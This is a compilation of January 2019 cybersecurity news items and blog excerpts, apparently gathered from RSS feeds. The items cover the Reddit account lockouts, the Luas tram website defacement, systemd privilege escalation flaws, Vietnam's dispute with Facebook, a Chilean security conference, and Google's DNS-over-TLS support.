The lockout has occurred as Reddit's security team investigates what appears to have been an attempt to log into many users' accounts through a credential-stuffing attack.

The post Reddit users locked out of accounts after “security concern” appeared first on The State of Security.

Smashing Security #110: What? You can get paid to leave Facebook?

Smashing Security #110: What? You can get paid to leave Facebook?

Twitter and the not-so-ethical hacking of celebrity accounts, study discovers how you can pay someone to quit Facebook for a year, and the millions of dollars you can make from uncovering software vulnerabilities.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

Security newsround: January 2019

We round up interesting research and reporting about security and privacy from around the web. This month: the security year in review, resilience on rails, incidents in depth, phishing hooks millennials, Internet of Threats, and CISOs climbing the corporate ladder.

A look back at cybercrime in 2018

It wouldn’t be a new year’s email without a retrospective on major security incidents over the previous 12 months. Credit to CSO Online for assembling a useful overview of some of last year’s most common risks and threats. To beef up this resource, it sourced external research and stats, while adding plenty of links for further reading. Some of the highlights include the massive rise in cryptocurrency mining. “Coin miners not only slow down devices but can overheat batteries and sometimes render a device useless,” it warned.

The article also advises against posting mobile numbers on the internet, because criminals are finding ways to harvest them for various scams. CSO also advises organisations about knowing the value of their data in order to protect it accordingly. Threatpost has a handy at-a-glance guide to some of the big security incidents from the past year. Meanwhile, kudos to Vice Motherboard for its excellent ‘jealousy list’ which rounds up great hacking and security stories from 2018 that first appeared in other media outlets.

Luas security derails tram website

The new year got off to a bad start for Dublin’s tram operator Luas, after an unknown attacker defaced its website in a security incident. On January 2nd, the Luas site had this message: “You are hacked… some time ago i wrote that you have serious security holes… you didn’t reply… the next time someone talks to you, press the reply button… you must pay 1 bitcoin in 5 days… otherwise I will publish all data and send emails to your users.”

The incident exposed 3,226 user records, and Luas said they belonged to customers who had subscribed to its newsletter. News of the incident spread widely, possibly due to Luas’ high profile as a victim, or because of the cryptocurrency angle.

The tram service itself was not affected, nor was the company’s online payments system. While the website was down, Luas used its Twitter feed to communicate travel updates to the public, and warned people not to visit the site. Interviewed by the Irish Times, Brian Honan said the incident showed that many organisations tend to forget website security after launch. As we’ve previously blogged, it’s worth carrying out periodic vulnerability assessments to spot gaps that an attacker could exploit. With the Luas site not fully back six days later, Brian noted on Twitter that it’s important to integrate incident response with business continuity management.

One hacked laptop and two hundred solemn faces

When an employee of a global apparel company clicked on a link in a phishing email while connected to a coffee shop wifi, they unwittingly let a cybercrime gang onto their corporate network. Once in, the attackers installed Framework POS malware on the company’s retail server to steal credit card details. It’s one real-life example from CrowdStrike’s Cyber Intrusion Casebook. The report details various incident response cases from 2018. It also gives recommendations for organisations on steps to take to protect their critical data better. In addition to coverage in online news reports, the document is available as a free PDF on CrowdStrike’s site.

Examples like these show the need for resilience, which we’ve blogged about before. No security is 100 per cent perfect. But it shouldn’t follow that one gap in the defences brings the entire wall crumbling down.

Digitally savvy, yes. Security savvy, not so much

Speaking of phishing, a new survey has found that digital natives are twice as likely to have fallen victim to a phishing scam than their older – sorry, we mean more experienced –  colleagues. Some 17 per cent in the 23-41 age group clicked on a phishing link, compared to 42-53 years old (6 per cent) or 54+ (7 per cent). The findings suggest a gap between perception and reality.

Out of all the age groups, digital natives were the most confident in their ability to spot a scam compared to their senior peers. Yet the 14 per cent of digital natives who weren’t as sure of their ability to spot a phish was strikingly close to the percentage in the same age bracket who had fallen for a phishing email. The survey by Censuswide for Datapac found that 14 per cent of Irish office workers – around 185,000 people – have been successfully phished at some stage.

OWASP’s IoT hit list

Is your organisation planning an Internet of Things project in 2019? Then you might want to send them in OWASP’s direction first. The group’s IoT project aims to improve understanding of the security issues around embedding sensors in, well, anything. To that end, the group has updated its top 10 list for IoT. The risks include old reliables like weak, guessable passwords, outdated components, insecure data transfer or storage, and lack of physical hardening. The full list is here.

The number’s up for CISO promotions

Why do relatively few security professionals ascend to the highest levels of business? That’s the provocative question from Raj Samani, chief scientist with McAfee. In an op-ed for Infosecurity Magazine, Samani argues that security hasn’t yet communicated its value to the business in an identifiable way. Proof of this is the fatigue or indifference over ever-mounting numbers of data breaches. Unlike a physical incident like a car accident where the impact is instantly visible, security incidents don’t have the same obvious cause and effect.

“The inability to determine quantifiable loss means that identifying measures to reduce risk are merely estimated at best. Moreover, if the loss is rarely felt, then the value of taking active steps to protect an asset can simply be overlooked,” Samani writes. “We can either bemoan the status quo or identify an approach that allows us to articulate our business value in a quantifiable way.”

The post Security newsround: January 2019 appeared first on BH Consulting.

Neiman Marcus to Pay $1.5 Million under Data Breach Settlement

Neiman Marcus Group, Inc. has agreed to pay $1.5 million as part of a settlement for an earlier data breach that exposed customers’ information. Ken Paxton, Attorney General of Texas, announced on 8 January that he and his fellow Attorneys General from 42 other states will enter into the $1.5 million settlement with Neiman Marcus. […]… Read More

The post Neiman Marcus to Pay $1.5 Million under Data Breach Settlement appeared first on The State of Security.

New Systemd Privilege Escalation Flaws Affect Most Linux Distributions

Security researchers have discovered three vulnerabilities in Systemd, a popular init system and service manager for most Linux operating systems, that could allow unprivileged local attackers or malicious programs to gain root access on the targeted systems. The vulnerabilities, assigned as CVE-2018-16864, CVE-2018-16865, and CVE-2018-16866, actually resides in the "systemd-journald" service

Security Vulnerabilities in Cell Phone Systems

Good essay on the inherent vulnerabilities in the cell phone standards and the market barriers to fixing them.

So far, industry and policymakers have largely dragged their feet when it comes to blocking cell-site simulators and SS7 attacks. Senator Ron Wyden, one of the few lawmakers vocal about this issue, sent a letter in August encouraging the Department of Justice to "be forthright with federal courts about the disruptive nature of cell-site simulators." No response has ever been published.

The lack of action could be because it is a big task -- there are hundreds of companies and international bodies involved in the cellular network. The other reason could be that intelligence and law enforcement agencies have a vested interest in exploiting these same vulnerabilities. But law enforcement has other effective tools that are unavailable to criminals and spies. For example, the police can work directly with phone companies, serving warrants and Title III wiretap orders. In the end, eliminating these vulnerabilities is just as valuable for law enforcement as it is for everyone else.

As it stands, there is no government agency that has the power, funding and mission to fix the problems. Large companies such as AT&T, Verizon, Google and Apple have not been public about their efforts, if any exist.

Facebook Accused of Violating Vietnam’s Cyber Law

Vietnam’s controversial cybersecurity law that tightens government control of the online environment just came into effect on Jan. 1 and it’s already claiming its first victim, writes the Financial Times.

On Tuesday, the communist country accused Facebook of not complying with its new law by refusing to immediately delete fan pages with content the government considers defamatory. According to Vietnam’s Authority of Broadcasting and Electronic Information (ABEI), Vietnamese account holders freely published “slanderous content, anti-government sentiment and libel and defamation of individuals, organizations and state agencies.”

The cybersecurity law, passed in June 2018, forms part of Vietnam’s strategy to tighten media control and restrict free speech online.

“This decision has potentially devastating consequences for freedom of expression in Vietnam,” Amnesty International stated at the time. “In the country’s deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities.”

Citing a Vietnamese market research report, the government body accuses Facebook of allowing advertising for scams and fake or illegal products. “The Vietnamese report claimed some $235 million was spent on Facebook ads in 2018, with $152.1 million going to Google,” writes TechCrunch.

As a result, Vietnam wants to penalize Facebook by taxing advertising revenue.

“We have a clear process for governments to report illegal content to us, and we review all these requests against our terms of service and local law,” Facebook responded. “We are transparent about the content restrictions we make in accordance with local law in our Transparency Report.”

Vietnamese authorities requested information on suspicious accounts, but Facebook refused to hand over user data, as it would violate community standards.

Hackers Using Zero-Width Spaces to Bypass MS Office 365 Protection

Security researchers have been warning about a simple technique that cybercriminals and email scammers are already being using in the wild to bypass security features of Microsoft Office 365, including Safe Links, which are originally designed to protect users from malware and phishing attacks. Safe Links has been included by Microsoft in Office 365 as part of its ATP (Advanced Threat Protection

The world’s southernmost security conference

When asked about his best race, Ayrton Senna replied that it was when he raced karting cars. For him it was the best because it was only for the sake of sports and free from commercial sponsoring and commercial interests. I have this same feeling about computer security conferences, because they attract people who really seek knowledge, both to receive and to share it.

In November I had the privilege of participating in a conference that can rightfully be labelled the world’s southernmost. It is called “Patagonia Hacking” and it is organized in the Chilean city of Punta Arenas: https://www.patagoniasec.cl

This event develops in two days – the first is dedicated to workshops, and the second is for presentations to the attendants. On my part, I had the opportunity to present two topics, one each day. On the day dedicated to conferences, my topic was the “Black Box” attacks against financial institutions in Latin America – a phenomenon that has become a fearful reality for the banks in the region.

Although the event took place in a remote city, attendants included enthusiasts from all over the world. There also were some Latin American speakers.

Despite the low temperatures and strong winds, the event’s welcome was very warm. It was very pleasant meeting the region’s new experts and sharing with them during those busy days.

The third edition of the event took place this year. If you plan to participate next year, apart from the conference, you should try the traditional lamb meat, Calafate beer and Calafate’s pisco sour, as well as making time to visit the Strait of Magellan Park which includes Fort Bulnes.

P.S. A curious fact – it seems that the southernmost city with Uber also happens to be Punta Arenas.

Google DNS Service ( Now Supports DNS-over-TLS Security

Almost every activity on the Internet starts with a DNS query, a key function of the Internet that works as an Internet's directory where your device looks up for the server IP addresses after you enter a human-readable web address (e.g., thehackernews.com). Since DNS queries are sent in clear text over UDP or TCP without encryption, the information can reveal not only what websites an

Turns Out Kaspersky Labs Helped FBI Catch Alleged NSA Leaker

Remember "The Shadow Brokers" and the arrest of a former NSA contractor accused of stealing 50 Terabytes of top secret documents from the intelligence agency? It turns out that, Kaspersky Lab, which has been banned in US government computers over spying fears, was the one who tipped off the U.S. government and helped the FBI catch NSA contractor Harold T. Martin III, unnamed sources familiar